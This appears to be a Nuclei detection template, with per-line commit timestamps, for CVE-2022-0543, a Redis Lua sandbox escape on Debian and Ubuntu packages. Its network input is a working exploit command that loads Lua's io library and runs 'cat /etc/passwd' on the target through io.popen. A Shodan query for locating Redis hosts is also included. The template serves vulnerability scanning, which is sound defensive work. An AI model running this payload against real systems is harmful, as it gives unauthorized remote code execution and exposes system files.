2022-04-28 13:21:04 +00:00
id : CVE-2022-0543
info :
2022-05-18 20:58:07 +00:00
name : Redis Sandbox Escape - Remote Code Execution
2022-04-28 13:21:04 +00:00
author : dwisiswant0
severity : critical
description : |
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries.
2022-05-17 09:18:12 +00:00
reference :
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
- https://bugs.debian.org/1005787
- https://www.debian.org/security/2022/dsa-5081
2022-04-28 13:21:26 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 10
2022-04-28 13:21:26 +00:00
cve-id : CVE-2022-0543
2022-05-17 09:18:12 +00:00
metadata :
shodan-query : redis_version
2022-04-28 13:22:35 +00:00
tags : cve,cve2022,network,redis,unauth,rce
2022-04-28 13:21:04 +00:00
network :
- inputs :
- data : "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
host :
- "{{Hostname}}"
- "{{Host}}:6379"
read-size : 64
matchers :
- type : regex
regex :
- "root:.*:0:0:"
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/18